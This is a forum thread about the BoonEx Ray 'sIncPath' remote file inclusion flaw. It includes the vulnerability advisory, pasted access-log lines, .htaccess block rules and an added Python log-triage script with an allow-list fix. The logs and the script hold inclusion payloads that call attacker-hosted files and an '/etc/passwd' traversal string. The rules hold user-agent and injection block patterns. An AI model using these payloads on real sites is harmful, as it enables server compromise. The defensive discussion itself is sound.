BoonEx Ray "sIncPath"

I was hacked with this last night. Is there a patch in the works for this? Or at least a workaround to protect against it?

Title : BoonEx Ray "sIncPath" Remote PHP File Inclusion Vulnerability
Advisory ID : VUPEN/ADV-2008-2033
CVE ID : CVE-2008-3166
CWE ID : CWE-98
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2008-07-09

Technical Description

A vulnerability has been identified in BoonEx Ray, which could be exploited by remote attackers to compromise a vulnerable web server [...]

Affected Products

BoonEx Ray version 3.5 and prior

Credits

Vulnerability reported by RoMaNcYxHaCkEr.

ChangeLog

2008-07-09 : Initial release

Vulnerability Management

Subscribe to VUPEN VNS and receive real-time e-mail and SMS alerts when new advisories or patches relevant to your systems and network configurations are available.

Feedback

If you have additional information or corrections for this security advisory please submit them via our contact form.

Here is one line from my log:

118.98.171.118 - - [14/Dec/2008:07:36:18 -0500] "GET //?sIncPath=hxxp://www.tos-belarus.org/data/cyberz.txt??? HXXP/1.1" 302 5 mysite.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "-"

Quote · 14 Dec 2008

It is unbelievable that this is not being addressed. I have seen so many of these posts, but no one has a fix.

Is Dolphin still being developed? Thank God I didn't PAY for this. With support like this, it would have been a HUGE waste of money.

Quote · 19 Dec 2008

Hi,

I have the same today; did you solve your problem? Thanks.

218.234.18.127 www.mysite.fr - [12/Mar/2009:16:55:19 +0100] "GET //?sIncPath=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 200 608 "-" "libwww-perl/5.79"
218.234.18.127 www.mysite.fr - [12/Mar/2009:16:55:21 +0100] "GET //?sIncPath=http://www.comosonries.com/sistem.gif??? HTTP/1.0" 200 608 "-" "Mozilla/5.0"
218.234.18.127 www.mysitee.fr - [12/Mar/2009:16:55:22 +0100] "GET //?sIncPath=http://www.comosonries.com/spread.txt??? HTTP/1.1" 500 557 "-" "libwww-perl/5.79"
201.5.247.144 www.mysite.fr - [12/Mar/2009:17:38:13 +0100] "GET //?sIncPath=super?? HTTP/1.1" 403 179 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"

Quote · 12 Mar 2009

Hi,

I had a hack attack from Tengkorak Crew using sIncPath.

Looking at the logs, there was a line such as:

http://www.facecook.org/?sIncPath=http://www.geocities.com/tengkorakcrew@ymail.com/indry.txt?

It seems it was due to register_globals not being set to off by the host (OVH).

The solution proposed by OVH (http://guide.ovh.net/configphp) is to add the following at the top of the .htaccess:

SetEnv REGISTER_GLOBALS 0

And it seems it worked.

regards

yann

Quote · 20 Mar 2009

Sammie,

I got a second hack attack that succeeded in using my site to perform phishing... the site is now stopped by the host until I sort out the issue.

The attack seems to use the weakness in the ray/module/global/inc scripts.

I've just tried your solution and hope it will convince the host (OVH). Did you get any hacks since you performed the modification?

thanks

yann

Quote · 31 Mar 2009

Would you have any recommendation for an alternative host?

thanks in advance

yanno

Quote · 31 Mar 2009

Would you have any recommendation for an alternative host?

thanks in advance

yanno

hostforweb.com is a good choice and is also recommended by some of the BoonEx team.

Diddy is not greedy and has time. Dolphin is cool and its not just mine :-)
Quote · 31 Mar 2009

I added this to my .htaccess file. I haven't done Sammie's fix yet, but will.

I added this at the bottom of the mod_rewrite block, just before the </IfModule>:

##################################
# Block Hacking Attempts - BEGIN #
# Rule 1: any request whose query string contains one of these words is
# sent to localhost (note: matched case-sensitively, as a plain substring)
RewriteCond %{QUERY_STRING} ^.*(chat|inc|modules|plugins|ray).*$
RewriteRule ^.*$ http://127.0.0.1/ [redirect,last]
# Rule 2: forbid common scripting clients by User-Agent, except when the
# request comes from the listed search-engine crawler ranges
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib|Java/?[1-9]\.[0-9]) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib|java/?[1-9]\.[0-9]) [NC]
RewriteCond %{REMOTE_ADDR} !^207\.126\.2(2[4-9]|3[0-9])\.
RewriteCond %{REMOTE_ADDR} !^209\.73\.(1[6-8][0-9]|19[01])\.
RewriteCond %{REMOTE_ADDR} !^209\.131\.(3[2-9]|[45][0-9]|6[0-3])\.
RewriteCond %{REMOTE_ADDR} !^209\.237\.23[2-5]\.
RewriteCond %{REMOTE_ADDR} !^216\.239\.(3[2-9]|[45][0-9]|6[0-3])\.
RewriteRule !^403.*\.php$ - [F,L]
# Rule 3: forbid query strings carrying common injection payloads. This is a
# separate rule on purpose: RewriteCond lines without [OR] are ANDed with the
# lines before them, so chaining these onto the User-Agent conditions would
# only block requests that have BOTH a bad User-Agent AND a bad query string.
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule !^403.*\.php$ - [F,L]
# Block Hacking Attempts - END #
##################################
</IfModule>

Added this just after the </IfModule>:

# deny based on User-Agent (both lines must set the same variable name,
# since the "deny from env=" line below keys on it)
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bots

And added this.

order allow,deny
allow from all
deny from env=block_bad_bots

I haven't seen any more hacks since.

Quote · 20 May 2009
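The following is an added example, not code from this thread or from BoonEx. It triages the access-log lines quoted earlier in the thread (the first post and the 12 Mar 2009 post) and runs them through the .htaccess rules from the post above, modelled as two independent checks (User-Agent and query-string payloads) plus the substring redirect rule, to show which requests those rules would actually have stopped. It also shows the application-side fix for the sIncPath parameter: an allow-list lookup instead of building an include path from the raw value. The sample lines are constructed from the posted ones with attacker hosts replaced by `evil.example`, the first line rewritten in standard combined format, and two extra lines added (a traversal attempt from a documentation IP and a harmless `sort=incoming` request); the allow-list in `safe_include`, the base directory and all function names are assumptions of this example.

```python
"""Triage Apache access-log lines for Ray ``sIncPath`` inclusion attempts.

Added example for this forum thread, not BoonEx/Dolphin code. LOG_LINES are
CONSTRUCTED from the lines posted in the thread (hosts replaced, two lines
added). Helper names and the allow-list are hypothetical.
"""
import os
import re
from urllib.parse import parse_qs

LOG_LINES = [
    '118.98.171.118 - - [14/Dec/2008:07:36:18 -0500] "GET //?sIncPath=http://evil.example/data/cyberz.txt??? HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"',
    '218.234.18.127 - - [12/Mar/2009:16:55:19 +0100] "GET //?sIncPath=http://evil.example/sistem.gif??? HTTP/1.1" 200 608 "-" "libwww-perl/5.79"',
    '218.234.18.127 - - [12/Mar/2009:16:55:21 +0100] "GET //?sIncPath=http://evil.example/sistem.gif??? HTTP/1.0" 200 608 "-" "Mozilla/5.0"',
    '218.234.18.127 - - [12/Mar/2009:16:55:22 +0100] "GET //?sIncPath=http://evil.example/spread.txt??? HTTP/1.1" 500 557 "-" "libwww-perl/5.79"',
    '201.5.247.144 - - [12/Mar/2009:17:38:13 +0100] "GET //?sIncPath=super?? HTTP/1.1" 403 179 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"',
    # constructed: local-file variant of the same parameter abuse
    '203.0.113.9 - - [12/Mar/2009:18:00:00 +0100] "GET /index.php?sIncPath=../../../../etc/passwd%00 HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    # constructed: harmless request whose query string contains "inc"
    '198.51.100.4 - - [12/Mar/2009:18:01:00 +0100] "GET /index.php?sort=incoming HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["path"], _, req["query"] = req["target"].partition("?")
    req["params"] = parse_qs(req["query"], keep_blank_values=True)  # decodes %00 etc.
    req["status"] = int(req["status"])
    return req


# Any URL scheme: http://, ftp://, and PHP stream wrappers such as php://, data:
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)


def classify_inc_path(value):
    """'remote' for URL/wrapper includes, 'local' for traversal or absolute paths."""
    if value is None:
        return None
    if SCHEME_RE.match(value):
        return "remote"
    if ".." in value or "\x00" in value or value.startswith("/"):
        return "local"
    return "other"


# The posted .htaccess rules, modelled as independent checks (the SetEnvIf
# psycheclone deny is folded into the User-Agent pattern).
REDIRECT_RE = re.compile(r"chat|inc|modules|plugins|ray")  # case-sensitive, as posted
UA_BLOCK_RE = re.compile(
    r"libwww-perl|Indy Library|psycheclone|^(?:python[-.]?urllib|java/?[1-9]\.[0-9])", re.I
)
QS_BLOCK_RES = [
    re.compile(r"base64_encode.*\(.*\)"),
    re.compile(r"(<|%3C).*script.*(>|%3E)", re.I),
    re.compile(r"GLOBALS(=|\[|%[0-9A-Z]{0,2})"),
    re.compile(r"_REQUEST(=|\[|%[0-9A-Z]{0,2})"),
]


def posted_rules_verdict(req):
    """What the posted rules do with a request: 'redirect', 'forbidden' or 'allow'."""
    if REDIRECT_RE.search(req["query"]):
        return "redirect"
    if UA_BLOCK_RE.search(req["ua"]) or any(p.search(req["query"]) for p in QS_BLOCK_RES):
        return "forbidden"
    return "allow"


def triage(lines):
    """One record per parseable line: source, status, sIncPath value, its kind, rule verdict."""
    records = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        value = req["params"].get("sIncPath", [None])[0]
        records.append({
            "ip": req["ip"], "status": req["status"], "inc_path": value,
            "kind": classify_inc_path(value), "posted_rules": posted_rules_verdict(req),
        })
    return records


# Application-side fix: never build an include path from the raw parameter.
ALLOWED_INCLUDES = {"global", "chat", "presence"}  # hypothetical allow-list
TOKEN_RE = re.compile(r"^[A-Za-z0-9_]+$")


def safe_include(token, base_dir="/var/www/ray/modules"):
    """Map a user token to a module directory only if it is allow-listed; else None."""
    if token is None or not TOKEN_RE.match(token) or token not in ALLOWED_INCLUDES:
        return None
    return os.path.join(base_dir, token)


if __name__ == "__main__":
    for r in triage(LOG_LINES):
        print(f'{r["ip"]:15} {r["status"]} {str(r["kind"]):6} {r["posted_rules"]:9} {r["inc_path"]!r}')
```

Running it shows the gap in the posted rules: the two requests that carry a remote URL in sIncPath but arrive with a browser User-Agent (the 302 on 14 Dec and the 200 on 12 Mar from "Mozilla/5.0") pass every rule, because the substring rule is case-sensitive and "sIncPath" does not contain "inc", while the harmless `sort=incoming` request is redirected. The libwww-perl requests are only stopped by their User-Agent, which an attacker changes in one line. Blocking has to key on the parameter value itself, which is what the allow-list in `safe_include` does on the application side, regardless of register_globals.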
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.